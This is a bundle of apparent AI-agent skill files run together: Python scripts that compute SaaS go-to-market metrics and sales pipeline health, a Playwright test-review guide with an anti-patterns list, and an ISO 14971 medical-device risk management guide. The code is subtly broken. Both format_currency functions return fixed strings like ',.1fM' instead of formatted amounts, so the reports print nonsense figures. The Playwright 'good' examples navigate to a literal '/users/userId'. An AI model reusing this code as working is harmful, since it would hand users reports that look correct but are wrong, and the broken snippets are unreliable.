f"Rule of 40 score is {r40['value']}% (target >40%). Balance of growth and "
"profitability needs improvement. Either accelerate growth or improve margins."
)
# NDR
ndr = metrics["ndr"]
if ndr["rating"] == "Red":
recs.append(
f"NDR is {ndr['ndr_pct']}% (target >110%). Net revenue is contracting from "
"the existing base. Prioritize churn reduction and expansion playbooks."
)
elif ndr["rating"] == "Yellow":
recs.append(
f"NDR is {ndr['ndr_pct']}%. Base is stable but not expanding. "
"Invest in cross-sell/upsell motions and customer success capacity."
)
# Positive summary if everything is green
green_count = sum(
1 for m in metrics.values()
if isinstance(m, dict) and m.get("rating") == "Green"
)
total_metrics = 6
if green_count == total_metrics:
recs.append(
"All GTM efficiency metrics are in healthy ranges. Maintain current "
"trajectory and optimize for best-in-class performance."
)
elif green_count >= 4:
recs.append(
f"{green_count}/{total_metrics} metrics are green. GTM efficiency is generally "
"healthy. Address the yellow/red areas for continuous improvement."
)
return recs
def calculate_all_metrics(data: dict) -> dict[str, Any]:
"""Calculate all GTM efficiency metrics from input data.
Args:
data: Input data with revenue, costs, and customers sections.
Returns:
Complete GTM efficiency analysis results.
"""
revenue = data["revenue"]
costs = data["costs"]
customers = data["customers"]
metrics = {
"magic_number": calculate_magic_number(
net_new_arr=revenue["net_new_arr"],
sm_spend=costs["sales_marketing_spend"],
),
"ltv_cac": calculate_ltv_cac(
arpa_monthly=revenue["arpa_monthly"],
gross_margin_pct=costs["gross_margin_pct"],
annual_churn_rate_pct=customers["annual_churn_rate_pct"],
cac=costs["cac"],
),
"cac_payback": calculate_cac_payback(
cac=costs["cac"],
arpa_monthly=revenue["arpa_monthly"],
gross_margin_pct=costs["gross_margin_pct"],
),
"burn_multiple": calculate_burn_multiple(
net_burn=costs["net_burn"],
net_new_arr=revenue["net_new_arr"],
),
"rule_of_40": calculate_rule_of_40(
revenue_growth_pct=revenue["revenue_growth_pct"],
fcf_margin_pct=costs["fcf_margin_pct"],
),
"ndr": calculate_ndr(
beginning_arr=customers["beginning_arr"],
expansion_arr=customers["expansion_arr"],
contraction_arr=customers["contraction_arr"],
churned_arr=customers["churned_arr"],
),
}
metrics["recommendations"] = generate_recommendations(metrics)
return metrics
def format_currency(value: float) -> str:
"""Format a number as currency."""
if abs(value) >= 1_000_000:
return f",.1fM"
elif abs(value) >= 1_000:
return f",.1fK"
return f",.0f"
def format_text_report(results: dict) -> str:
"""Format analysis results as a human-readable text report."""
lines = []
lines.append("=" * 70)
lines.append("GTM EFFICIENCY REPORT")
lines.append("=" * 70)
# Metric summary table
metrics_order = [
("magic_number", "Magic Number", lambda m: f"{m['value']}"),
("ltv_cac", "LTV:CAC Ratio", lambda m: f"{m['ratio']}:1"),
("cac_payback", "CAC Payback", lambda m: f"{m['months']} months"),
("burn_multiple", "Burn Multiple", lambda m: f"{m['value']}x"),
("rule_of_40", "Rule of 40", lambda m: f"{m['value']}%"),
("ndr", "Net Dollar Retention", lambda m: f"{m['ndr_pct']}%"),
]
lines.append("")
lines.append("METRICS SUMMARY")
lines.append("-" * 70)
lines.append(f" {'Metric':25s} {'Value':>12s} {'Rating':>8s} {'Target':>15s}")
lines.append(f" {'':25s} {'':>12s} {'':>8s} {'':>15s}")
for key, name, fmt_fn in metrics_order:
m = results[key]
lines.append(
f" {name:25s} {fmt_fn(m):>12s} {m['rating']:>8s} {m['target']:>15s}"
)
# Detailed breakdown
lines.append("")
lines.append("DETAILED BREAKDOWN")
lines.append("-" * 70)
# Magic Number
mn = results["magic_number"]
lines.append("")
lines.append(f" MAGIC NUMBER: {mn['value']}")
lines.append(f" Net New ARR: {format_currency(mn['net_new_arr'])}")
lines.append(f" S&M Spend: {format_currency(mn['sm_spend'])}")
lines.append(f" Rating: {mn['rating']} - {mn['label']}")
lines.append(f" Percentile: {mn['percentile']}")
# LTV:CAC
lc = results["ltv_cac"]
lines.append("")
lines.append(f" LTV:CAC RATIO: {lc['ratio']}:1")
lines.append(f" Customer LTV: {format_currency(lc['ltv'])}")
lines.append(f" CAC: {format_currency(lc['cac'])}")
lines.append(f" ARPA (Monthly): {format_currency(lc['arpa_monthly'])}")
lines.append(f" Gross Margin: {lc['gross_margin_pct']}%")
lines.append(f" Churn Rate: {lc['annual_churn_rate_pct']}%")
lines.append(f" Rating: {lc['rating']} - {lc['label']}")
lines.append(f" Percentile: {lc['percentile']}")
# CAC Payback
cp = results["cac_payback"]
lines.append("")
lines.append(f" CAC PAYBACK: {cp['months']} months")
lines.append(f" CAC: {format_currency(cp['cac'])}")
lines.append(f" Monthly Contribution:{format_currency(cp['monthly_contribution'])}")
lines.append(f" Rating: {cp['rating']} - {cp['label']}")
lines.append(f" Percentile: {cp['percentile']}")
# Burn Multiple
bm = results["burn_multiple"]
lines.append("")
lines.append(f" BURN MULTIPLE: {bm['value']}x")
lines.append(f" Net Burn: {format_currency(bm['net_burn'])}")
lines.append(f" Net New ARR: {format_currency(bm['net_new_arr'])}")
lines.append(f" Rating: {bm['rating']} - {bm['label']}")
lines.append(f" Percentile: {bm['percentile']}")
# Rule of 40
r40 = results["rule_of_40"]
lines.append("")
lines.append(f" RULE OF 40: {r40['value']}%")
lines.append(f" Revenue Growth: {r40['revenue_growth_pct']}%")
lines.append(f" FCF Margin: {r40['fcf_margin_pct']}%")
lines.append(f" Rating: {r40['rating']} - {r40['label']}")
lines.append(f" Percentile: {r40['percentile']}")
# NDR
ndr = results["ndr"]
lines.append("")
lines.append(f" NET DOLLAR RETENTION: {ndr['ndr_pct']}%")
lines.append(f" Beginning ARR: {format_currency(ndr['beginning_arr'])}")
lines.append(f" Expansion: +{format_currency(ndr['expansion_arr'])}")
lines.append(f" Contraction: -{format_currency(ndr['contraction_arr'])}")
lines.append(f" Churn: -{format_currency(ndr['churned_arr'])}")
lines.append(f" Ending ARR: {format_currency(ndr['ending_arr'])}")
lines.append(f" Rating: {ndr['rating']} - {ndr['label']}")
lines.append(f" Percentile: {ndr['percentile']}")
# Recommendations
lines.append("")
lines.append("RECOMMENDATIONS")
lines.append("-" * 70)
for i, rec in enumerate(results["recommendations"], 1):
lines.append(f" {i}. {rec}")
lines.append("")
lines.append("=" * 70)
return "\n".join(lines)
def main() -> None:
"""Main entry point for GTM efficiency calculator CLI."""
parser = argparse.ArgumentParser(
description="Calculate GTM efficiency metrics for SaaS revenue teams."
)
parser.add_argument(
"input",
help="Path to JSON file containing GTM data",
)
parser.add_argument(
"--format",
choices=["json", "text"],
default="text",
help="Output format: json or text (default: text)",
)
args = parser.parse_args()
try:
with open(args.input, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"Error: File not found: {args.input}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {args.input}: {e}", file=sys.stderr)
sys.exit(1)
required_sections = ["revenue", "costs", "customers"]
for section in required_sections:
if section not in data:
print(
f"Error: Missing required section '{section}' in input data",
file=sys.stderr,
)
sys.exit(1)
results = calculate_all_metrics(data)
if args.format == "json":
print(json.dumps(results, indent=2))
else:
print(format_text_report(results))
if __name__ == "__main__":
main()
FILE:scripts/pipeline_analyzer.py
#!/usr/bin/env python3
"""Pipeline Analyzer - Analyzes sales pipeline health for SaaS revenue teams.
Calculates pipeline coverage ratios, stage conversion rates, sales velocity,
deal aging risks, and concentration risks from pipeline data.
Usage:
python pipeline_analyzer.py --input pipeline.json --format text
python pipeline_analyzer.py --input pipeline.json --format json
"""
import argparse
import json
import sys
from datetime import datetime, date
from typing import Any
def safe_divide(numerator: float, denominator: float, default: float = 0.0) -> float:
"""Safely divide two numbers, returning default if denominator is zero."""
if denominator == 0:
return default
return numerator / denominator
def parse_date(date_str: str) -> date:
"""Parse a date string in YYYY-MM-DD format."""
return datetime.strptime(date_str, "%Y-%m-%d").date()
def get_quarter(d: date) -> str:
"""Return the quarter string for a given date (e.g., '2025-Q1')."""
quarter = (d.month - 1) // 3 + 1
return f"{d.year}-Q{quarter}"
def calculate_coverage_ratio(deals: list[dict], quota: float) -> dict[str, Any]:
"""Calculate pipeline coverage ratio against quota.
Target: 3-4x pipeline coverage for healthy pipeline.
"""
total_pipeline = sum(d["value"] for d in deals if d["stage"] != "Closed Won")
ratio = safe_divide(total_pipeline, quota)
if ratio >= 4.0:
rating = "Strong"
elif ratio >= 3.0:
rating = "Healthy"
elif ratio >= 2.0:
rating = "At Risk"
else:
rating = "Critical"
return {
"total_pipeline_value": total_pipeline,
"quota": quota,
"coverage_ratio": round(ratio, 2),
"rating": rating,
"target": "3.0x - 4.0x",
}
def calculate_stage_conversion_rates(
deals: list[dict], stages: list[str]
) -> list[dict[str, Any]]:
"""Calculate stage-to-stage conversion rates.
Measures the percentage of deals that progress from one stage to the next.
"""
stage_order = {stage: i for i, stage in enumerate(stages)}
stage_counts: dict[str, int] = {stage: 0 for stage in stages}
for deal in deals:
stage = deal["stage"]
if stage in stage_order:
stage_idx = stage_order[stage]
# A deal at stage N has passed through all stages 0..N
for i in range(stage_idx + 1):
stage_counts[stages[i]] += 1
conversions = []
for i in range(len(stages) - 1):
from_stage = stages[i]
to_stage = stages[i + 1]
from_count = stage_counts[from_stage]
to_count = stage_counts[to_stage]
rate = safe_divide(to_count, from_count) * 100
conversions.append({
"from_stage": from_stage,
"to_stage": to_stage,
"from_count": from_count,
"to_count": to_count,
"conversion_rate_pct": round(rate, 1),
})
return conversions
def calculate_sales_velocity(deals: list[dict]) -> dict[str, Any]:
"""Calculate sales velocity.
Formula: (# opportunities x avg deal size x win rate) / avg sales cycle length
Result is revenue per day.
"""
if not deals:
return {
"num_opportunities": 0,
"avg_deal_size": 0,
"win_rate_pct": 0,
"avg_cycle_days": 0,
"velocity_per_day": 0,
"velocity_per_month": 0,
}
won_deals = [d for d in deals if d["stage"] == "Closed Won"]
open_deals = [d for d in deals if d["stage"] != "Closed Won"]
all_considered = deals
num_opportunities = len(all_considered)
avg_deal_size = safe_divide(
sum(d["value"] for d in all_considered), num_opportunities
)
win_rate = safe_divide(len(won_deals), num_opportunities)
avg_cycle_days = safe_divide(
sum(d["age_days"] for d in all_considered), num_opportunities
)
velocity_per_day = safe_divide(
num_opportunities * avg_deal_size * win_rate, avg_cycle_days
)
return {
"num_opportunities": num_opportunities,
"avg_deal_size": round(avg_deal_size, 2),
"win_rate_pct": round(win_rate * 100, 1),
"avg_cycle_days": round(avg_cycle_days, 1),
"velocity_per_day": round(velocity_per_day, 2),
"velocity_per_month": round(velocity_per_day * 30, 2),
}
def analyze_deal_aging(
deals: list[dict], average_cycle_days: int, stages: list[str]
) -> dict[str, Any]:
"""Analyze deal aging and flag stale deals.
Flags deals older than 2x the average cycle time.
Uses stage-specific thresholds based on position in the pipeline.
"""
aging_threshold = average_cycle_days * 2
num_stages = len(stages)
stage_order = {stage: i for i, stage in enumerate(stages)}
# Stage-specific thresholds: early stages get more time, later stages less
stage_thresholds: dict[str, int] = {}
for i, stage in enumerate(stages):
if stage == "Closed Won":
continue
# Progressive thresholds: first stage gets full cycle, last open stage gets 50%
progress = safe_divide(i, num_stages - 1)
threshold = int(average_cycle_days * (1.0 + (1.0 - progress)))
stage_thresholds[stage] = threshold
aging_deals = []
healthy_deals = 0
at_risk_deals = 0
for deal in deals:
if deal["stage"] == "Closed Won":
continue
stage = deal["stage"]
age = deal["age_days"]
threshold = stage_thresholds.get(stage, aging_threshold)
if age > threshold:
at_risk_deals += 1
aging_deals.append({
"id": deal["id"],
"name": deal["name"],
"stage": stage,
"age_days": age,
"threshold_days": threshold,
"days_over": age - threshold,
"value": deal["value"],
})
else:
healthy_deals += 1
aging_deals.sort(key=lambda x: x["days_over"], reverse=True)
return {
"global_aging_threshold_days": aging_threshold,
"stage_thresholds": stage_thresholds,
"total_open_deals": healthy_deals + at_risk_deals,
"healthy_deals": healthy_deals,
"at_risk_deals": at_risk_deals,
"aging_deals": aging_deals,
}
def assess_pipeline_risk(
deals: list[dict], quota: float, stages: list[str]
) -> dict[str, Any]:
"""Assess overall pipeline risk.
Checks for:
- Concentration risk (>40% in single deal)
- Stage distribution health
- Coverage gap by quarter
"""
open_deals = [d for d in deals if d["stage"] != "Closed Won"]
total_pipeline = sum(d["value"] for d in open_deals)
# Concentration risk
concentration_risks = []
for deal in open_deals:
pct = safe_divide(deal["value"], total_pipeline) * 100
if pct > 40:
concentration_risks.append({
"id": deal["id"],
"name": deal["name"],
"value": deal["value"],
"pct_of_pipeline": round(pct, 1),
"risk_level": "HIGH",
})
elif pct > 25:
concentration_risks.append({
"id": deal["id"],
"name": deal["name"],
"value": deal["value"],
"pct_of_pipeline": round(pct, 1),
"risk_level": "MEDIUM",
})
has_concentration_risk = any(
r["risk_level"] == "HIGH" for r in concentration_risks
)
# Stage distribution
stage_distribution: dict[str, dict] = {}
for stage in stages:
if stage == "Closed Won":
continue
stage_deals = [d for d in open_deals if d["stage"] == stage]
count = len(stage_deals)
value = sum(d["value"] for d in stage_deals)
stage_distribution[stage] = {
"count": count,
"value": value,
"pct_of_pipeline": round(safe_divide(value, total_pipeline) * 100, 1),
}
# Check for empty stages (unhealthy funnel)
empty_stages = [
stage for stage, data in stage_distribution.items() if data["count"] == 0
]
# Coverage gap by quarter
today = date.today()
quarterly_coverage: dict[str, float] = {}
for deal in open_deals:
try:
close_date = parse_date(deal["close_date"])
quarter = get_quarter(close_date)
quarterly_coverage[quarter] = (
quarterly_coverage.get(quarter, 0) + deal["value"]
)
except (ValueError, KeyError):
pass
quarterly_target = quota / 4
coverage_gaps = []
for quarter, value in sorted(quarterly_coverage.items()):
coverage = safe_divide(value, quarterly_target)
if coverage < 3.0:
coverage_gaps.append({
"quarter": quarter,
"pipeline_value": value,
"quarterly_target": quarterly_target,
"coverage_ratio": round(coverage, 2),
"gap": "Below 3x target",
})
# Overall risk rating
risk_factors = 0
if has_concentration_risk:
risk_factors += 2
if len(empty_stages) > 0:
risk_factors += 1
if len(coverage_gaps) > 0:
risk_factors += 1
if safe_divide(total_pipeline, quota) < 3.0:
risk_factors += 2
if risk_factors >= 4:
overall_risk = "HIGH"
elif risk_factors >= 2:
overall_risk = "MEDIUM"
else:
overall_risk = "LOW"
return {
"overall_risk": overall_risk,
"risk_factors_count": risk_factors,
"concentration_risks": concentration_risks,
"has_concentration_risk": has_concentration_risk,
"stage_distribution": stage_distribution,
"empty_stages": empty_stages,
"coverage_gaps": coverage_gaps,
}
def analyze_pipeline(data: dict) -> dict[str, Any]:
"""Run complete pipeline analysis.
Args:
data: Pipeline data with deals, quota, stages, and average_cycle_days.
Returns:
Complete analysis results dictionary.
"""
deals = data["deals"]
quota = data["quota"]
stages = data["stages"]
average_cycle_days = data.get("average_cycle_days", 45)
return {
"coverage": calculate_coverage_ratio(deals, quota),
"stage_conversions": calculate_stage_conversion_rates(deals, stages),
"velocity": calculate_sales_velocity(deals),
"aging": analyze_deal_aging(deals, average_cycle_days, stages),
"risk": assess_pipeline_risk(deals, quota, stages),
}
def format_currency(value: float) -> str:
"""Format a number as currency."""
if value >= 1_000_000:
return f",.1fM"
elif value >= 1_000:
return f",.1fK"
return f",.0f"
def format_text_report(results: dict) -> str:
"""Format analysis results as a human-readable text report."""
lines = []
lines.append("=" * 70)
lines.append("PIPELINE ANALYSIS REPORT")
lines.append("=" * 70)
# Coverage
cov = results["coverage"]
lines.append("")
lines.append("PIPELINE COVERAGE")
lines.append("-" * 40)
lines.append(f" Total Pipeline: {format_currency(cov['total_pipeline_value'])}")
lines.append(f" Quota Target: {format_currency(cov['quota'])}")
lines.append(f" Coverage Ratio: {cov['coverage_ratio']}x (Target: {cov['target']})")
lines.append(f" Rating: {cov['rating']}")
# Stage Conversions
lines.append("")
lines.append("STAGE CONVERSION RATES")
lines.append("-" * 40)
for conv in results["stage_conversions"]:
lines.append(
f" {conv['from_stage']} -> {conv['to_stage']}: "
f"{conv['conversion_rate_pct']}% "
f"({conv['to_count']}/{conv['from_count']})"
)
# Velocity
vel = results["velocity"]
lines.append("")
lines.append("SALES VELOCITY")
lines.append("-" * 40)
lines.append(f" Opportunities: {vel['num_opportunities']}")
lines.append(f" Avg Deal Size: {format_currency(vel['avg_deal_size'])}")
lines.append(f" Win Rate: {vel['win_rate_pct']}%")
lines.append(f" Avg Cycle: {vel['avg_cycle_days']} days")
lines.append(f" Velocity/Day: {format_currency(vel['velocity_per_day'])}")
lines.append(f" Velocity/Month: {format_currency(vel['velocity_per_month'])}")
# Aging
aging = results["aging"]
lines.append("")
lines.append("DEAL AGING ANALYSIS")
lines.append("-" * 40)
lines.append(f" Total Open Deals: {aging['total_open_deals']}")
lines.append(f" Healthy: {aging['healthy_deals']}")
lines.append(f" At Risk: {aging['at_risk_deals']}")
if aging["aging_deals"]:
lines.append("")
lines.append(" AGING DEALS (needs attention):")
for deal in aging["aging_deals"]:
lines.append(
f" - {deal['name']} ({deal['stage']}): "
f"{deal['age_days']}d (threshold: {deal['threshold_days']}d, "
f"+{deal['days_over']}d over) | {format_currency(deal['value'])}"
)
# Risk
risk = results["risk"]
lines.append("")
lines.append("PIPELINE RISK ASSESSMENT")
lines.append("-" * 40)
lines.append(f" Overall Risk: {risk['overall_risk']}")
lines.append(f" Risk Factors: {risk['risk_factors_count']}")
if risk["concentration_risks"]:
lines.append("")
lines.append(" CONCENTRATION RISKS:")
for cr in risk["concentration_risks"]:
lines.append(
f" - {cr['name']}: {format_currency(cr['value'])} "
f"({cr['pct_of_pipeline']}% of pipeline) [{cr['risk_level']}]"
)
if risk["empty_stages"]:
lines.append("")
lines.append(f" EMPTY STAGES: {', '.join(risk['empty_stages'])}")
lines.append("")
lines.append(" STAGE DISTRIBUTION:")
for stage, data in risk["stage_distribution"].items():
bar = "#" * max(1, int(data["pct_of_pipeline"] / 2))
lines.append(
f" {stage:20s} {data['count']:3d} deals "
f"{format_currency(data['value']):>10s} "
f"{data['pct_of_pipeline']:5.1f}% {bar}"
)
if risk["coverage_gaps"]:
lines.append("")
lines.append(" COVERAGE GAPS BY QUARTER:")
for gap in risk["coverage_gaps"]:
lines.append(
f" - {gap['quarter']}: {gap['coverage_ratio']}x coverage "
f"({format_currency(gap['pipeline_value'])} vs "
f"{format_currency(gap['quarterly_target'])} target)"
)
lines.append("")
lines.append("=" * 70)
return "\n".join(lines)
def main() -> None:
"""Main entry point for pipeline analyzer CLI."""
parser = argparse.ArgumentParser(
description="Analyze sales pipeline health for SaaS revenue teams."
)
parser.add_argument(
"--input",
required=True,
help="Path to JSON file containing pipeline data",
)
parser.add_argument(
"--format",
choices=["json", "text"],
default="text",
help="Output format: json or text (default: text)",
)
args = parser.parse_args()
try:
with open(args.input, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"Error: File not found: {args.input}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {args.input}: {e}", file=sys.stderr)
sys.exit(1)
# Validate required fields
required_fields = ["deals", "quota", "stages"]
for field in required_fields:
if field not in data:
print(f"Error: Missing required field '{field}' in input data", file=sys.stderr)
sys.exit(1)
results = analyze_pipeline(data)
if args.format == "json":
print(json.dumps(results, indent=2))
else:
print(format_text_report(results))
if __name__ == "__main__":
main()
Đánh giá chất lượng các bài test Playwright, kiểm tra theo thực hành tốt nhất và đề xuất cải thiện.
---
name: "review"
description: >-
Review Playwright tests for quality. Use when user says "review tests",
"check test quality", "audit tests", "improve tests", "test code review",
or "playwright best practices check".
---
# Review Playwright Tests
Systematically review Playwright test files for anti-patterns, missed best practices, and coverage gaps.
## Input
`$ARGUMENTS` can be:
- A file path: review that specific test file
- A directory: review all test files in the directory
- Empty: review all tests in the project's `testDir`
## Steps
### 1. Gather Context
- Read `playwright.config.ts` for project settings
- List all `*.spec.ts` / `*.spec.js` files in scope
- If reviewing a single file, also check related page objects and fixtures
### 2. Check Each File Against Anti-Patterns
Load `anti-patterns.md` from this skill directory. Check for all 20 anti-patterns.
**Critical (must fix):**
1. `waitForTimeout()` usage
2. Non-web-first assertions (`expect(await ...)`)
3. Hardcoded URLs instead of `baseURL`
4. CSS/XPath selectors when role-based exists
5. Missing `await` on Playwright calls
6. Shared mutable state between tests
7. Test execution order dependencies
**Warning (should fix):**
8. Tests longer than 50 lines (consider splitting)
9. Magic strings without named constants
10. Missing error/edge case tests
11. `page.evaluate()` for things locators can do
12. Nested `test.describe()` more than 2 levels deep
13. Generic test names ("should work", "test 1")
**Info (consider):**
14. No page objects for pages with 5+ locators
15. Inline test data instead of factory/fixture
16. Missing accessibility assertions
17. No visual regression tests for UI-heavy pages
18. Console error assertions not checked
19. Network idle waits instead of specific assertions
20. Missing `test.describe()` grouping
### 3. Score Each File
Rate 1-10 based on:
- **9-10**: Production-ready, follows all golden rules
- **7-8**: Good, minor improvements possible
- **5-6**: Functional but has anti-patterns
- **3-4**: Significant issues, likely flaky
- **1-2**: Needs rewrite
### 4. Generate Review Report
For each file:
```
## <filename> — Score: X/10
### Critical
- Line 15: `waitForTimeout(2000)` → use `expect(locator).toBeVisible()`
- Line 28: CSS selector `.btn-submit` → `getByRole('button', { name: "submit" })`
### Warning
- Line 42: Test name "test login" → "should redirect to dashboard after login"
### Suggestions
- Consider adding error case: what happens with invalid credentials?
```
### 5. For Project-Wide Review
If reviewing an entire test suite:
- Spawn sub-agents per file for parallel review (up to 5 concurrent)
- Or use `/batch` for very large suites
- Aggregate results into a summary table
### 6. Offer Fixes
For each critical issue, provide the corrected code. Ask user: "Apply these fixes? [Yes/No]"
If yes, apply all fixes using `Edit` tool.
## Output
- File-by-file review with scores
- Summary: total files, average score, critical issue count
- Actionable fix list
- Coverage gaps identified (pages/features with no tests)
FILE:anti-patterns.md
# Playwright Anti-Patterns Reference
## 1. Using `waitForTimeout()`
**Bad:**
```typescript
await page.click('.submit');
await page.waitForTimeout(3000);
await expect(page.locator('.result')).toBeVisible();
```
**Good:**
```typescript
await page.getByRole('button', { name: 'Submit' }).click();
await expect(page.getByTestId('result')).toBeVisible();
```
**Why:** Arbitrary waits slow tests and cause flakiness. Web-first assertions auto-retry.
## 2. Non-Web-First Assertions
**Bad:**
```typescript
const text = await page.textContent('.message');
expect(text).toBe('Success');
```
**Good:**
```typescript
await expect(page.getByText('Success')).toBeVisible();
```
**Why:** `expect(locator)` auto-retries until timeout. `expect(value)` checks once and fails.
## 3. Hardcoded URLs
**Bad:**
```typescript
await page.goto('http://localhost:3000/login');
```
**Good:**
```typescript
await page.goto('/login');
```
**Why:** `baseURL` in config handles the host. Tests break across environments with hardcoded URLs.
## 4. CSS/XPath When Role-Based Exists
**Bad:**
```typescript
await page.click('#submit-btn');
await page.locator('.nav-link.active').click();
```
**Good:**
```typescript
await page.getByRole('button', { name: 'Submit' }).click();
await page.getByRole('link', { name: 'Dashboard' }).click();
```
**Why:** Role-based locators survive CSS renames, class refactors, and component library changes.
## 5. Missing `await`
**Bad:**
```typescript
page.goto('/dashboard');
expect(page.getByText('Welcome')).toBeVisible();
```
**Good:**
```typescript
await page.goto('/dashboard');
await expect(page.getByText('Welcome')).toBeVisible();
```
**Why:** Missing `await` causes race conditions. Tests pass sometimes, fail others.
## 6. Shared Mutable State
**Bad:**
```typescript
let userId: string;
test('create user', async ({ page }) => {
// ... creates user, sets userId
userId = '123';
});
test('edit user', async ({ page }) => {
await page.goto(`/users/userId`); // depends on previous test
});
```
**Good:**
```typescript
test('edit user', async ({ page }) => {
// Create user via API in this test's setup
const userId = await createUserViaAPI();
await page.goto(`/users/userId`);
});
```
**Why:** Tests must be independent. Shared state causes order-dependent failures.
## 7. Execution Order Dependencies
**Bad:**
```typescript
test('step 1: fill form', async ({ page }) => { ... });
test('step 2: submit form', async ({ page }) => { ... });
test('step 3: verify result', async ({ page }) => { ... });
```
**Good:**
```typescript
test('should fill and submit form successfully', async ({ page }) => {
// All steps in one test
});
```
**Why:** Playwright runs tests in parallel by default. Order-dependent tests fail randomly.
## 8. Tests Over 50 Lines
Split into focused tests. Each test should verify one behavior.
## 9. Magic Strings
**Bad:**
```typescript
await page.getByLabel('Email').fill('admin@test.com');
```
**Good:**
```typescript
const TEST_USER = { email: 'admin@test.com', password: 'Test123!' };
await page.getByLabel('Email').fill(TEST_USER.email);
```
## 10. Missing Error Cases
If you test the happy path, also test:
- Invalid input
- Empty state
- Network error
- Permission denied
- Timeout/loading state
## 11. Using `page.evaluate()` Unnecessarily
**Bad:**
```typescript
const text = await page.evaluate(() => document.querySelector('.title')?.textContent);
```
**Good:**
```typescript
await expect(page.getByRole('heading')).toHaveText('Expected Title');
```
## 12. Deep Nesting
Keep `test.describe()` to max 2 levels. More makes tests hard to find and maintain.
## 13. Generic Test Names
**Bad:** `test('test 1')`, `test('should work')`, `test('login test')`
**Good:** `test('should show error when email is invalid')`, `test('should redirect to dashboard after successful login')`
## 14-20. Style Issues
- No page objects for complex pages → create them
- Inline data → use factories or fixtures
- Missing a11y assertions → add `toHaveAttribute('role', ...)`
- No visual regression → add `toHaveScreenshot()` for key pages
- Not checking console errors → add `page.on('console', ...)`
- Using `networkidle` → use specific assertions instead
- No `test.describe()` → group related tests
Quản lý rủi ro thiết bị y tế theo ISO 14971: phân tích, đánh giá, kiểm soát rủi ro và phân tích thông tin sau sản xuất.
---
name: "risk-management-specialist"
description: Medical device risk management specialist implementing ISO 14971 throughout product lifecycle. Provides risk analysis, risk evaluation, risk control, and post-production information analysis. Use when user mentions risk management, ISO 14971, risk analysis, FMEA, fault tree analysis, hazard identification, risk control, risk matrix, benefit-risk analysis, residual risk, risk acceptability, or post-market risk.
---
# Risk Management Specialist
ISO 14971:2019 risk management implementation throughout the medical device lifecycle.
---
## Table of Contents
- [Risk Management Planning Workflow](#risk-management-planning-workflow)
- [Risk Analysis Workflow](#risk-analysis-workflow)
- [Risk Evaluation Workflow](#risk-evaluation-workflow)
- [Risk Control Workflow](#risk-control-workflow)
- [Post-Production Risk Management](#post-production-risk-management)
- [Risk Assessment Templates](#risk-assessment-templates)
- [Decision Frameworks](#decision-frameworks)
- [Tools and References](#tools-and-references)
---
## Risk Management Planning Workflow
Establish risk management process per ISO 14971.
### Workflow: Create Risk Management Plan
1. Define scope of risk management activities:
- Medical device identification
- Lifecycle stages covered
- Applicable standards and regulations
2. Establish risk acceptability criteria:
- Define probability categories (P1-P5)
- Define severity categories (S1-S5)
- Create risk matrix with acceptance thresholds
3. Assign responsibilities:
- Risk management lead
- Subject matter experts
- Approval authorities
4. Define verification activities:
- Methods for control verification
- Acceptance criteria
5. Plan production and post-production activities:
- Information sources
- Review triggers
- Update procedures
6. Obtain plan approval
7. Establish risk management file
8. **Validation:** Plan approved; acceptability criteria defined; responsibilities assigned; file established
### Risk Management Plan Content
| Section | Content | Evidence |
|---------|---------|----------|
| Scope | Device and lifecycle coverage | Scope statement |
| Criteria | Risk acceptability matrix | Risk matrix document |
| Responsibilities | Roles and authorities | RACI chart |
| Verification | Methods and acceptance | Verification plan |
| Production/Post-Production | Monitoring activities | Surveillance plan |
### Risk Acceptability Matrix (5x5)
| Probability \ Severity | Negligible | Minor | Serious | Critical | Catastrophic |
|------------------------|------------|-------|---------|----------|--------------|
| **Frequent (P5)** | Medium | High | High | Unacceptable | Unacceptable |
| **Probable (P4)** | Medium | Medium | High | High | Unacceptable |
| **Occasional (P3)** | Low | Medium | Medium | High | High |
| **Remote (P2)** | Low | Low | Medium | Medium | High |
| **Improbable (P1)** | Low | Low | Low | Medium | Medium |
### Risk Level Actions
| Level | Acceptable | Action Required |
|-------|------------|-----------------|
| Low | Yes | Document and accept |
| Medium | ALARP | Reduce if practicable; document rationale |
| High | ALARP | Reduction required; demonstrate ALARP |
| Unacceptable | No | Design change mandatory |
---
## Risk Analysis Workflow
Identify hazards and estimate risks systematically.
### Workflow: Conduct Risk Analysis
1. Define intended use and reasonably foreseeable misuse:
- Medical indication
- Patient population
- User population
- Use environment
2. Select analysis method(s):
- FMEA for component/function analysis
- FTA for system-level analysis
- HAZOP for process deviations
- Use Error Analysis for user interaction
3. Identify hazards by category:
- Energy hazards (electrical, mechanical, thermal)
- Biological hazards (bioburden, biocompatibility)
- Chemical hazards (residues, leachables)
- Operational hazards (software, use errors)
4. Determine hazardous situations:
- Sequence of events
- Foreseeable misuse scenarios
- Single fault conditions
5. Estimate probability of harm (P1-P5)
6. Estimate severity of harm (S1-S5)
7. Document in hazard analysis worksheet
8. **Validation:** All hazard categories addressed; all hazards documented; probability and severity assigned
### Hazard Categories Checklist
| Category | Examples | Analyzed |
|----------|----------|----------|
| Electrical | Shock, burns, interference | ☐ |
| Mechanical | Crushing, cutting, entrapment | ☐ |
| Thermal | Burns, tissue damage | ☐ |
| Radiation | Ionizing, non-ionizing | ☐ |
| Biological | Infection, biocompatibility | ☐ |
| Chemical | Toxicity, irritation | ☐ |
| Software | Incorrect output, timing | ☐ |
| Use Error | Misuse, perception, cognition | ☐ |
| Environment | EMC, mechanical stress | ☐ |
### Analysis Method Selection
| Situation | Recommended Method |
|-----------|-------------------|
| Component failures | FMEA |
| System-level failure | FTA |
| Process deviations | HAZOP |
| User interaction | Use Error Analysis |
| Software behavior | Software FMEA |
| Early design phase | PHA |
### Probability Criteria
| Level | Name | Description | Frequency |
|-------|------|-------------|-----------|
| P5 | Frequent | Expected to occur | >10⁻³ |
| P4 | Probable | Likely to occur | 10⁻³ to 10⁻⁴ |
| P3 | Occasional | May occur | 10⁻⁴ to 10⁻⁵ |
| P2 | Remote | Unlikely | 10⁻⁵ to 10⁻⁶ |
| P1 | Improbable | Very unlikely | <10⁻⁶ |
### Severity Criteria
| Level | Name | Description | Harm |
|-------|------|-------------|------|
| S5 | Catastrophic | Death | Death |
| S4 | Critical | Permanent impairment | Irreversible injury |
| S3 | Serious | Injury requiring intervention | Reversible injury |
| S2 | Minor | Temporary discomfort | No treatment needed |
| S1 | Negligible | Inconvenience | No injury |
